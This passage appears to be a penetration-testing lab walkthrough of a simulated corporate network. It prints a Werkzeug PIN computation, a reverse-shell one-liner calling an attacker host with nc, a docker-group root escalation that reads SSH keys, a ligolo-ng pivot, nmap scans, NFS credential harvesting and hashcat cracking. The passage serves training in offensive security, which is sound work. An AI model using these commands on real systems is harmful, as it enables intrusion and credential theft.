cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv = None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)
```
```
$ python3.12 pin-poc.py
672-875-321
```
Once in the console, run the code below to get a shell
```python
__import__('os').popen('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.2 4444 >/tmp/f').read();
```
Privilege Escalation
Use the srvadm user's docker group membership to mount /root into a container and read its key file
```
srvadm@WEB-NIX01:~$ id
id
uid=1002(srvadm) gid=1002(srvadm) groups=1002(srvadm),119(docker)
srvadm@WEB-NIX01:~$ docker images
docker images
REPOSITORY           TAG       IMAGE ID       CREATED       SIZE
securetransferprod   latest    6f52bdbbf650   2 years ago   1.06GB
tmp_securetransfer   latest    ba39a533c032   2 years ago   855MB
tmp_vpn              latest    14fa9ab62e10   2 years ago   246MB
tmp_dev              latest    f70cf97cfe0c   2 years ago   223MB
tmp_osticket         latest    1d44a3603b8a   2 years ago   1.5GB
tmp_shop             latest    b4fee9523990   2 years ago   458MB
tmp_hr               latest    006074398af3   2 years ago   242MB
tmp_jobs             latest    68a67e7c1252   2 years ago   40.5MB
tmp_pr               latest    c8f1d6fa82f6   2 years ago   275MB
mariadb              latest    40b966d7252f   2 years ago   383MB
gogs/gogs            latest    2d3ecd7629e1   2 years ago   94.8MB
ubuntu               20.04     3bc6e9f30f51   2 years ago   72.8MB
alpine               3.13      38cacb9bafd2   2 years ago   5.61MB
joomla               latest    1d5bf464d602   2 years ago   625MB
srvadm@WEB-NIX01:~$ docker run -v /root:/mnt -it ubuntu:20.04
docker run -v /root:/mnt -it ubuntu:20.04
root@d83a15237dbf:/# ls -al /mnt
ls -al /mnt
total 64
drwx------ 7 root root  4096 Jan 20 11:31 .
drwxr-xr-x 1 root root  4096 Jan 20 11:52 ..
lrwxrwxrwx 1 root root     9 Aug  3  2022 .bash_history -> /dev/null
-rw-r--r-- 1 root root  3106 Dec  5  2019 .bashrc
drwx------ 3 root root  4096 Aug  3  2022 .cache
drwx------ 3 root root  4096 Aug 18  2022 .config
drwxr-xr-x 3 root root  4096 Aug  3  2022 .local
-rw-r--r-- 1 root root   161 Dec  5  2019 .profile
-rw------- 1 root root    39 Aug  8  2022 .python_history
drwx------ 2 root root  4096 Aug  3  2022 .ssh
-rw------- 1 root root 15201 Sep 14  2022 .viminfo
-rw-r--r-- 1 root root   215 Aug  3  2022 .wget-hsts
-rw-r--r-- 1 root root    33 Jan 20 11:31 flag.txt
drwxr-xr-x 3 root root  4096 Oct  6  2021 snap
root@d83a15237dbf:/# cat /mnt/flag.txt
cat /mnt/flag.txt
0c26cae4e085afd8f3e3d2eaa3b67715
```
Read the root user's id_rsa key file
```
root@d83a15237dbf:/# ls -al /mnt/.ssh
ls -al /mnt/.ssh
total 20
drwx------ 2 root root 4096 Aug  3  2022 .
drwx------ 7 root root 4096 Jan 20 11:31 ..
-rw------- 1 root root  568 Aug  3  2022 authorized_keys
-rw------- 1 root root 2602 Aug  3  2022 id_rsa
-rw-r--r-- 1 root root  568 Aug  3  2022 id_rsa.pub
root@d83a15237dbf:/# cat /mnt/.ssh/id_rsa
cat /mnt/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
<SNIP>
-----END OPENSSH PRIVATE KEY-----
```
```
$ chmod 600 id_rsa
$ ssh -i id_rsa root@10.129.194.34
<SNIP>
root@WEB-NIX01:~#
```
Pivot
Upload the ligolo-ng agent to WEB-NIX01
```
scp -i id_rsa ~/Cybersecurity/transfer/agent root@10.129.194.34:~/
```
After starting the ligolo-ng proxy, run the command below on WEB-NIX01
```
root@WEB-NIX01:~# ./agent -connect 10.10.16.2:11601 -ignore-cert
```
Start the ligolo-ng proxy and set up the interface and route
```
$ sudo ./proxy -selfcert
[sudo] password for kali:
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
WARN[0000] Using self-signed certificates
WARN[0000] TLS Certificate fingerprint for ligolo is: E5D693014A596F64F94182EE781819FBF8CAD4A21C6C2259041083B5F912459F
INFO[0000] Listening on 0.0.0.0:11601

  Made in France ♥ by @Nicocha30!
  Version: 0.6.2

ligolo-ng » ifcreate --name ligolo
INFO[0014] Creating a new "ligolo" interface...
INFO[0014] Interface created!
ligolo-ng » route_add --name ligolo --route 172.16.139.0/24
INFO[0044] Route created.
ligolo-ng » INFO[4160] Agent joined.                                 name=root@WEB-NIX01 remote="10.129.194.34:40736"
ligolo-ng » session
? Specify a session : 1 - #1 - root@WEB-NIX01 - 10.129.194.34:40736
[Agent : root@WEB-NIX01] » start --tun ligolo
INFO[4216] Starting tunnel to root@WEB-NIX01
```
fping
```
$ fping -asqg 172.16.139.0/24
172.16.139.3
172.16.139.10
172.16.139.35

     254 targets
       3 alive
     250 unreachable
       0 unknown addresses

    1003 timeouts (waiting for response)
    1007 ICMP Echos sent
       7 ICMP Echo Replies received
       0 other ICMP received

 383 ms (min round trip time)
 432 ms (avg round trip time)
 567 ms (max round trip time)
        9.875 sec (elapsed real time)
```
nmap
```
$ nmap --open -PE -oA nmap_1k -iL host.list
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-19 02:17 EST
Nmap scan report for 172.16.139.3
Host is up (0.65s latency).
Not shown: 989 closed tcp ports (reset)
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl

Nmap scan report for 172.16.139.35
Host is up (0.71s latency).
Not shown: 989 closed tcp ports (reset)
PORT      STATE SERVICE
111/tcp   open  rpcbind
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
2049/tcp  open  nfs
3389/tcp  open  ms-wbt-server
4848/tcp  open  appserv-http
7676/tcp  open  imqbrokerd
8080/tcp  open  http-proxy
8181/tcp  open  intermapper
10000/tcp open  snet-sensor-mgmt

Nmap done: 2 IP addresses (2 hosts up) scanned in 33.89 seconds
```
```
$ nmap --open -p- -A -PE -oA nmap_all -iL host.list
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-19 03:04 EST
Nmap scan report for 172.16.139.3
Host is up (0.33s latency).
Not shown: 65510 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-19 08:35:27Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: trilocor.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: trilocor.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc         Microsoft Windows RPC
49680/tcp open  msrpc         Microsoft Windows RPC
49684/tcp open  msrpc         Microsoft Windows RPC
49692/tcp open  msrpc         Microsoft Windows RPC
49704/tcp open  msrpc         Microsoft Windows RPC
Aggressive OS guesses: 3Com Baseline Switch 2924-SFP or Cisco ESW-520 switch or Allied Telesis AT-8000 series switch (86%), Allied Telesis AT-8000S; Dell PowerConnect 2824, 3448, 5316M, or 5324; Linksys SFE2000P, SRW2024, SRW2048, or SRW224G4; or TP-LINK TL-SL3428 switch (86%), Linksys SRW2008MP switch (86%), Cisco SG 300-10, Dell PowerConnect 2748, Linksys SLM2024, SLM2048, or SLM224P, or Netgear FS728TP or GS724TP switch (86%), Linksys SRW2000-series or Allied Telesyn AT-8000S switch (86%), DragonFly BSD 2.9.1 - 3.1 (85%), Cisco SG 200 or SG 300 switch (85%), Cisco SRW2008-K9 switch (85%), OpenBSD 5.5 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:94:c6:4b (VMware)
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-01-19T08:39:44
|_  start_date: N/A

TRACEROUTE
HOP RTT       ADDRESS
1   330.73 ms 172.16.139.3

Nmap scan report for 172.16.139.35
Host is up (0.34s latency).
Not shown: 65505 closed tcp ports (reset)
PORT      STATE SERVICE              VERSION
111/tcp   open  rpcbind?
|_rpcinfo: ERROR: Script execution failed (use -d to debug)
135/tcp   open  msrpc                Microsoft Windows RPC
139/tcp   open  netbios-ssn          Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
2049/tcp  open  mountd               1-3 (RPC #100005)
3389/tcp  open  ms-wbt-server        Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: trilocor
|   NetBIOS_Domain_Name: trilocor
|   NetBIOS_Computer_Name: MS01
|   DNS_Domain_Name: trilocor.local
|   DNS_Computer_Name: MS01.trilocor.local
|   DNS_Tree_Name: trilocor.local
|   Product_Version: 10.0.17763
|_  System_Time: 2025-01-19T08:39:39+00:00
| ssl-cert: Subject: commonName=MS01.trilocor.local
| Not valid before: 2025-01-17T14:48:50
|_Not valid after:  2025-07-19T14:48:50
|_ssl-date: 2025-01-19T08:39:59+00:00; 0s from scanner time.
3700/tcp  open  giop                 CORBA naming service
|_giop-info: ERROR: Script execution failed (use -d to debug)
3820/tcp  open  ssl/scp?
|_ssl-date: 2025-01-19T08:40:00+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=MS01.trilocor.local/organizationName=Oracle Corporation/stateOrProvinceName=California/countryName=US
| Not valid before: 2022-07-26T13:21:24
|_Not valid after:  2032-07-23T13:21:24
3920/tcp  open  ssl/exasoftport1?
|_ssl-date: 2025-01-19T08:40:01+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=MS01.trilocor.local/organizationName=Oracle Corporation/stateOrProvinceName=California/countryName=US
| Not valid before: 2022-07-26T13:21:24
|_Not valid after:  2032-07-23T13:21:24
4848/tcp  open  http                 Oracle GlassFish 3.1.2.2 (Servlet 3.0; JSP 2.2; Java 1.7)
|_http-title: Login
|_http-server-header: Oracle GlassFish Server 3.1.2.2
5985/tcp  open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
7676/tcp  open  java-message-service Java Message Service 4.5.2 Patch 1
8080/tcp  open  http                 Oracle GlassFish 3.1.2.2 (Servlet 3.0; JSP 2.2; Java 1.7)
| http-methods:
|_  Potentially risky methods: PUT DELETE TRACE
|_http-title: GlassFish Server 3.1.2 - Server Running
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Oracle GlassFish Server 3.1.2.2
8181/tcp  open  ssl/intermapper?
|_ssl-date: 2025-01-19T08:40:00+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=MS01.trilocor.local/organizationName=Oracle Corporation/stateOrProvinceName=California/countryName=US
| Not valid before: 2022-07-26T13:21:24
|_Not valid after:  2032-07-23T13:21:24
8686/tcp  open  java-rmi             Java RMI
| rmi-dumpregistry:
|   MS01.trilocor.local/7676/jmxrmi
|     javax.management.remote.rmi.RMIServerImpl_Stub
|     @172.16.139.35:51544
|     extends
|       java.rmi.server.RemoteStub
|       extends
|         java.rmi.server.RemoteObject
|   jmxrmi
|     javax.management.remote.rmi.RMIServerImpl_Stub
|     @172.16.139.35:8686
|     extends
|       java.rmi.server.RemoteStub
|       extends
|_        java.rmi.server.RemoteObject
10000/tcp open  http                 Jetty 9.4.46.v20220331
|_http-server-header: Jetty(9.4.46.v20220331)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
| http-robots.txt: 1 disallowed entry
|_/
47001/tcp open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc                Microsoft Windows RPC
49665/tcp open  msrpc                Microsoft Windows RPC
49666/tcp open  msrpc                Microsoft Windows RPC
49667/tcp open  msrpc                Microsoft Windows RPC
49668/tcp open  msrpc                Microsoft Windows RPC
49669/tcp open  msrpc                Microsoft Windows RPC
49680/tcp open  msrpc                Microsoft Windows RPC
49681/tcp open  msrpc                Microsoft Windows RPC
49682/tcp open  msrpc                Microsoft Windows RPC
51544/tcp open  java-rmi             Java RMI
51547/tcp open  unknown
51548/tcp open  unknown
51549/tcp open  unknown
Device type: broadband router|phone|general purpose
Running (JUST GUESSING): Scientific Atlanta embedded (86%), Sony Ericsson embedded (85%), IBM z/OS 1.12.X (85%), IBM OS/390 V2 (85%), HP OpenVMS 7.X|8.X (85%)
OS CPE: cpe:/h:scientificatlanta:webstar_epc2203 cpe:/h:sonyericsson:j20 cpe:/h:sonyericsson:j20i cpe:/o:ibm:zos:1.12 cpe:/o:ibm:os_390:v2 cpe:/o:hp:openvms:7 cpe:/o:hp:openvms:8
Aggressive OS guesses: Scientific Atlanta WebSTAR EPC2203 cable modem (86%), Sony Ericsson Hazel (J10, J20) or Elm mobile phone (85%), Sony Ericsson W705 or W995 Walkman mobile phone (85%), IBM z/OS 1.12 (85%), IBM OS/390 V2 (85%), HP OpenVMS 7.3 - 8.3 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: MS01, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:94:38:4e (VMware)
| smb2-time:
|   date: 2025-01-19T08:39:35
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

TRACEROUTE
HOP RTT       ADDRESS
1   340.51 ms 172.16.139.35

Post-scan script results:
| clock-skew:
|   0s:
|     172.16.139.3
|_    172.16.139.35
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 2543.51 seconds
```
Service Enumeration

SMB (All Failed)

NFS (MS01)

Mount the NFS export of the MS01 machine:
```
$ showmount -e 172.16.139.35
Export list for 172.16.139.35:
/MS01 (everyone)
$ sudo mkdir /mnt/MS01
$ sudo mount -t nfs 172.16.139.35:/MS01 /mnt/MS01
$ cd /mnt/MS01
$ tree .
```
├── apps │ ├── glassfish │ │ ├── bin │ │ │ ├── appclient │ │ │ ├── appclient.bat │ │ │ ├── appclient.js │ │ │ ├── asadmin │ │ │ ├── asadmin.bat │ │ │ ├── asupgrade │ │ │ ├── asupgrade.bat │ │ │ ├── capture-schema │ │ │ ├── capture-schema.bat │ │ │ ├── jspc │ │ │ ├── jspc.bat │ │ │ ├── package-appclient │ │ │ ├── package-appclient.bat │ │ │ ├── schemagen │ │ │ ├── schemagen.bat │ │ │ ├── startserv │ │ │ ├── startserv.bat │ │ │ ├── stopserv │ │ │ ├── stopserv.bat │ │ │ ├── wscompile │ │ │ ├── wscompile.bat │ │ │ ├── wsdeploy │ │ │ ├── wsdeploy.bat │ │ │ ├── wsgen │ │ │ ├── wsgen.bat │ │ │ ├── wsimport │ │ │ ├── wsimport.bat │ │ │ ├── xjc │ │ │ └── xjc.bat │ │ ├── config │ │ │ ├── asenv.bat │ │ │ ├── asenv.conf │ │ │ ├── client-jnlp-config.properties │ │ │ ├── glassfish.container │ │ │ └── osgi.properties │ │ ├── docs │ │ │ ├── about.html │ │ │ ├── copyright.html │ │ │ ├── css │ │ │ │ └── default.css │ │ │ ├── features.html │ │ │ ├── graphics │ │ │ │ └── logo_sun.gif │ │ │ └── quickstart.html │ │ ├── domains │ │ │ └── domain1 │ │ │ ├── applications │ │ │ ├── autodeploy │ │ │ │ └── bundles │ │ │ ├── bin │ │ │ │ ├── domain1Service.err.log │ │ │ │ ├── domain1Service.exe │ │ │ │ ├── domain1Service.out.log │ │ │ │ ├── domain1Service.wrapper.log │ │ │ │ └── domain1Service.xml │ │ │ ├── config │ │ │ │ ├── admin-keyfile │ │ │ │ ├── cacerts.jks │ │ │ │ ├── default-web.xml │ │ │ │ ├── domain-passwords │ │ │ │ ├── domain.xml │ │ │ │ ├── domain.xml.bak │ │ │ │ ├── keyfile │ │ │ │ ├── keystore.jks │ │ │ │ ├── local-password │ │ │ │ ├── lockfile │ │ │ │ ├── logging.properties │ │ │ │ ├── login.conf │ │ │ │ ├── pid │ │ │ │ ├── pid.prev │ │ │ │ ├── server.policy │ │ │ │ ├── sun-acc.xml │ │ │ │ ├── wss-server-config-1.0.xml │ │ │ │ └── wss-server-config-2.0.xml │ │ │ ├── docroot │ │ │ │ └── index.html │ │ │ ├── generated │ │ │ │ ├── ejb │ │ │ │ │ └── __admingui │ │ │ │ ├── jsp │ │ │ │ │ ├── __admingui │ │ │ │ │ │ └── loader_529795024 │ │ │ │ │ │ ├── css │ │ │ │ │ │ │ ├── 
css_ie5win.css │ │ │ │ │ │ │ ├── css_ie6up.css │ │ │ │ │ │ │ ├── css_ns4sol.css │ │ │ │ │ │ │ ├── css_ns4win.css │ │ │ │ │ │ │ ├── css_ns6up.css │ │ │ │ │ │ │ └── sysnet.css │ │ │ │ │ │ ├── images │ │ │ │ │ │ │ ├── ar_dbl_blue.png │ │ │ │ │ │ │ ├── backimage.jpg │ │ │ │ │ │ │ ├── common_tasks.gif │ │ │ │ │ │ │ ├── configurations.gif │ │ │ │ │ │ │ ├── container.gif │ │ │ │ │ │ │ ├── disabled.png │ │ │ │ │ │ │ ├── domain.gif │ │ │ │ │ │ │ ├── dot.gif │ │ │ │ │ │ │ ├── enabled.png │ │ │ │ │ │ │ ├── gradlogbot.jpg │ │ │ │ │ │ │ ├── gradlogsides.jpg │ │ │ │ │ │ │ ├── gradlogtop.jpg │ │ │ │ │ │ │ ├── http.gif │ │ │ │ │ │ │ ├── instance.gif │ │ │ │ │ │ │ ├── jvm.gif │ │ │ │ │ │ │ ├── logger_1.gif │ │ │ │ │ │ │ ├── logger.gif │ │ │ │ │ │ │ ├── primary-enabled.gif │ │ │ │ │ │ │ ├── PrimaryProductName.png │ │ │ │ │ │ │ ├── primary-roll.gif │ │ │ │ │ │ │ ├── regbkgrnd.png │ │ │ │ │ │ │ ├── registration.gif │ │ │ │ │ │ │ ├── registration.png │ │ │ │ │ │ │ ├── regReminderBackground.png │ │ │ │ │ │ │ ├── regReminderBullets.png │ │ │ │ │ │ │ ├── resources.gif │ │ │ │ │ │ │ ├── support.gif │ │ │ │ │ │ │ ├── support.png │ │ │ │ │ │ │ ├── system_properties.png │ │ │ │ │ │ │ └── webModule.gif │ │ │ │ │ │ ├── index.jsf │ │ │ │ │ │ ├── js │ │ │ │ │ │ │ └── cj.js │ │ │ │ │ │ ├── loginError.jsf │ │ │ │ │ │ ├── login.jsf │ │ │ │ │ │ ├── META-INF │ │ │ │ │ │ │ ├── jsftemplating │ │ │ │ │ │ │ │ └── Handler.map │ │ │ │ │ │ │ ├── MANIFEST.MF │ │ │ │ │ │ │ └── maven │ │ │ │ │ │ │ └── org.glassfish.main.admingui │ │ │ │ │ │ │ └── console-core │ │ │ │ │ │ │ ├── pom.properties │ │ │ │ │ │ │ └── pom.xml │ │ │ │ │ │ ├── org │ │ │ │ │ │ │ └── glassfish │ │ │ │ │ │ │ └── admingui │ │ │ │ │ │ │ └── core │ │ │ │ │ │ │ └── Strings.properties │ │ │ │ │ │ └── templates │ │ │ │ │ │ ├── bareLayout.xhtml │ │ │ │ │ │ ├── baseLayout.xhtml │ │ │ │ │ │ ├── default.layout │ │ │ │ │ │ ├── iframe.layout │ │ │ │ │ │ ├── menu.inc │ │ │ │ │ │ ├── menuLayout.xhtml │ │ │ │ │ │ ├── tagsPanel.jsf │ │ │ │ │ │ └── 
treeLayout.xhtml │ │ │ │ │ └── __default-web-module-server │ │ │ │ ├── policy │ │ │ │ │ ├── __admingui │ │ │ │ │ │ └── __admingui │ │ │ │ │ │ └── granted.policy │ │ │ │ │ └── __default-web-module │ │ │ │ │ └── __default-web-module │ │ │ │ │ └── granted.policy │ │ │ │ └── xml │ │ │ │ └── __admingui │ │ │ ├── lib │ │ │ │ ├── applibs │ │ │ │ ├── classes │ │ │ │ ├── databases │ │ │ │ └── ext │ │ │ ├── logs │ │ │ │ ├── server.log │ │ │ │ └── server.log.lck │ │ │ ├── osgi-cache │ │ │ │ └── felix │ │ │ │ ├── bundle0 │ │ │ │ │ ├── bundle.id │ │ │ │ │ ├── glassfish.bundleids │ │ │ │ │ └── provisioning.properties │ │ │ │ ├── bundle1 │ │ │ │ │ ├── bundle.info │ │ │ │ │ └── version0.0 │ │ │ │ │ ├── bundle.jar │ │ │ │ │ └── revision.location <SNIP> │ ├── jboss │ │ ├── ApplicationClientComponentDescription.java │ │ ├── build.bat │ │ ├── build.sh │ │ ├── mvnw.cmd │ │ └── pom.xml │ └── tomcat │ ├── context.xml │ └── tomcat-users.xml ├── dev │ ├── Browser.cs │ ├── BuildPackages.bat │ ├── CKEditorDefaultSettings.xml │ ├── CKToolbarButtons.xml │ ├── CKToolbarSets.xml │ ├── EnterModus.cs │ ├── FileListView.cs │ ├── LanguageDirection.cs │ ├── LinkMode.cs │ ├── LinkType.cs │ ├── SettingConstants.cs │ ├── SettingsMode.cs │ └── ToolBarLocation.cs ├── docs │ ├── AppSvcsDeclare.docx │ ├── as3Parser.docx │ ├── Important Document.docx │ └── tasks.build.docx ├── prod │ ├── Browser.aspx │ ├── Browser.aspx.designer.cs │ ├── Browser.aspx.resx │ ├── Browser.comb.css │ ├── Browser.comb.min.css │ ├── Browser.css │ ├── FileUploader.ashx │ ├── FileUploader.ashx.cs │ ├── jquery.fileupload.css │ ├── jquery.fileupload-ui.css │ ├── ProcessImage.ashx │ └── ProcessImage.ashx.cs ├── public │ ├── bundleconfig.json │ ├── CKEditorOptions.ascx │ ├── CKEditorOptions.ascx.cs │ ├── CKEditorOptions.ascx.designer.cs │ ├── CKEditorOptions.ascx.resx │ ├── CKHtmlEditorProvider.cs │ ├── Options.aspx │ ├── Options.aspx.cs │ ├── Options.aspx.designer.cs │ ├── packages.config │ ├── UrlControl.ascx │ └── 
WatchersNET.CKEditor.csproj ├── temp │ ├── 6342234238_2022-12-04-trilocorweb01.log │ ├── 9447886652_2022-06-15-trilocorweb02.log │ ├── 9987886652_2022-11-09-trilocorweb03 .log │ └── 9995464534_2022-11-09-trilocorweb04.log └── websites ├── HR │ ├── index.php │ ├── script.js │ └── style.css ├── Jobs │ ├── includes │ │ ├── index.php │ │ └── theme │ │ ├── carousel.php │ │ ├── common.php │ │ ├── config.php │ │ ├── footer.php │ │ ├── header.php │ │ ├── head.php │ │ ├── index.php │ │ └── nav.php │ └── index.php ├── Main │ ├── config │ │ └── apache.conf │ ├── index.php │ └── wp-includes │ ├── css │ │ └── dist │ │ └── block-library │ │ └── style.min.css │ ├── js │ │ ├── jquery │ │ │ ├── jquery-migrate.min.js │ │ │ ├── jquery.min.js │ │ │ └── ui │ │ │ └── core.min.js │ │ └── wp-embed.min.js │ └── wlwmanifest.xml ├── PR │ ├── index.php │ └── static │ ├── css │ │ └── main.css │ ├── fonts │ │ └── Assistant │ │ ├── Assistant-Bold.woff │ │ └── Assistant-Bold.woff2 │ ├── images │ │ ├── about-history.jpg │ │ ├── about-philosophy.jpg │ │ ├── about-winners.jpg │ │ ├── favicon.png │ │ ├── introduction-visual.png │ │ ├── logo-mini.svg │ │ ├── logo.svg │ │ ├── team-1.png │ │ ├── team-2.png │ │ └── team-3.png │ └── js │ ├── ace.js │ ├── alerts.js │ ├── avgrund.js │ ├── bootstrap-table.js │ ├── bt-maxLength.js │ ├── c3.js │ ├── calendar.js │ ├── chartist.js │ ├── circle-progress.js │ ├── clipboard.js │ ├── codeEditor.js │ ├── codemirror.js │ ├── context-menu.js │ ├── cropper.js │ ├── dashboard.js │ ├── data-table.js │ ├── db.js │ ├── desktop-notification.js │ ├── dragula.js │ ├── dropify.js │ ├── dropzone.js │ ├── editorDemo.js │ ├── file-upload.js │ ├── flot-chart.js │ ├── form-addons.js │ ├── formpickers.js │ ├── form-repeater.js │ ├── form-validation.js │ ├── functions.js │ ├── functions-min.js │ ├── google-charts.js │ ├── google-maps.js │ ├── hoverable-collapse.js │ ├── iCheck.js │ ├── inputmask.js │ ├── ion-range-slider.js │ ├── jq.tablesort.js │ ├── jquery-file-upload.js │ ├── 
js-grid.js │ ├── just-gage.js │ ├── light-gallery.js │ ├── listify.js │ ├── mapael_example_2.js │ ├── mapael.js │ ├── maps.js │ ├── misc.js │ ├── modal-demo.js │ ├── morris.js │ ├── no-ui-slider.js │ ├── off-canvas.js │ ├── owl-carousel.js │ ├── paginate.js │ ├── popover.js │ ├── profile-demo.js │ ├── rickshaw.js │ ├── select2.js │ ├── settings.js │ ├── sparkline.js │ ├── tablesorter.js │ ├── tabs.js │ ├── tight-grid.js │ ├── toastDemo.js │ ├── todolist.js │ ├── tooltips.js │ ├── typeahead.js │ ├── widgets.js │ ├── wizard.js │ └── x-editable.js ├── Shop │ ├── config │ │ └── apache.conf │ ├── controllers │ │ └── HomeController.php │ ├── index.php │ ├── Router.php │ └── views │ ├── about.php │ ├── contact.php │ ├── faq.php │ ├── includes │ │ ├── footer.php │ │ └── header.php │ └── index.php └── Vpn ├── css │ └── ssl_style.css ├── fonts │ ├── ftnt-icons.woff │ └── lato-regular.woff2 ├── ico │ └── favicon.ico ├── index.php └── verify.php 690 directories, 1626 files
A password credential is found in /MS01/apps/glassfish/domains/domain1/config/local-password:

```
$ cat /mnt/MS01/apps/glassfish/domains/domain1/config/local-password
4DE1087766BC3CCF2EF3FCDE6B95B6686650FC23
```

Attempt to crack /MS01/apps/glassfish/domains/domain1/config/admin-keyfile (Failed):

```
$ cat /mnt/MS01/apps/glassfish/domains/domain1/config/admin-keyfile
admin;{SSHA256}vLs7Hu2paGhV3cD32u+ZKjosTR9hiF0+eyA2WT8FtOkXa/8OUvs4Sw==;asadmin
$ echo vLs7Hu2paGhV3cD32u+ZKjosTR9hiF0+eyA2WT8FtOkXa/8OUvs4Sw== | base64 -d | xxd -p -c 40 | sed 's/.\{64\}/&:/'
bcbb3b1eeda9686855ddc0f7daef992a3a2c4d1f61885d3e7b2036593f05b4e9:176bff0e52fb384b
$ hashcat -m 1410 --hex-salt hash rockyou.txt
(fail)
```
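The pipeline above splits the 40 decoded bytes into a 32-byte SHA-256 digest followed by an 8-byte salt, which is the sha256($pass.$salt) layout that hashcat mode 1410 expects. The Python below is an added example, not part of the writeup, that parses an admin-keyfile entry programmatically, emits the same hash:salt line, and verifies a candidate password against it; make_keyfile_entry, verify_password and the "audit"/"example-only" sample entry are constructions of this example.

```python
# Added example (not from the writeup): parse GlassFish admin-keyfile entries.
# Layout assumed here, matching the 64-hex-then-salt split and hashcat -m 1410
# (sha256($pass.$salt)) used above: base64( sha256(password || salt) || salt ).
import base64
import hashlib
import hmac
import os

SCHEME = "{SSHA256}"
DIGEST_LEN = hashlib.sha256().digest_size  # 32 bytes
SALT_LEN = 8                               # GlassFish appends an 8-byte salt


def parse_keyfile_entry(line):
    """Split 'user;{SSHA256}<base64>;group' into user, group, digest and salt."""
    user, hashed, group = line.strip().split(";", 2)
    if not hashed.startswith(SCHEME):
        raise ValueError("unsupported scheme in entry for %r" % user)
    raw = base64.b64decode(hashed[len(SCHEME):])
    if len(raw) <= DIGEST_LEN:
        raise ValueError("blob too short to hold a digest and a salt")
    return {"user": user, "group": group,
            "digest": raw[:DIGEST_LEN], "salt": raw[DIGEST_LEN:]}


def to_hashcat_line(entry):
    """hash:salt in hex, the form fed to hashcat -m 1410 with --hex-salt."""
    return "%s:%s" % (entry["digest"].hex(), entry["salt"].hex())


def verify_password(entry, candidate):
    """One SHA-256 per guess and no work factor: this is why the file must
    never be reachable through a world-readable export, as it was over NFS here."""
    digest = hashlib.sha256(candidate.encode("utf-8") + entry["salt"]).digest()
    return hmac.compare_digest(digest, entry["digest"])


def make_keyfile_entry(user, password, group, salt=None):
    """Build an entry of the same shape (used to exercise the round trip)."""
    salt = os.urandom(SALT_LEN) if salt is None else salt
    digest = hashlib.sha256(password.encode("utf-8") + salt).digest()
    blob = base64.b64encode(digest + salt).decode("ascii")
    return "%s;%s%s;%s" % (user, SCHEME, blob, group)


if __name__ == "__main__":
    # The entry recovered from the NFS export above.
    entry = parse_keyfile_entry(
        "admin;{SSHA256}vLs7Hu2paGhV3cD32u+ZKjosTR9hiF0+eyA2WT8FtOkXa/8OUvs4Sw==;asadmin")
    print(entry["user"], entry["group"], to_hashcat_line(entry))
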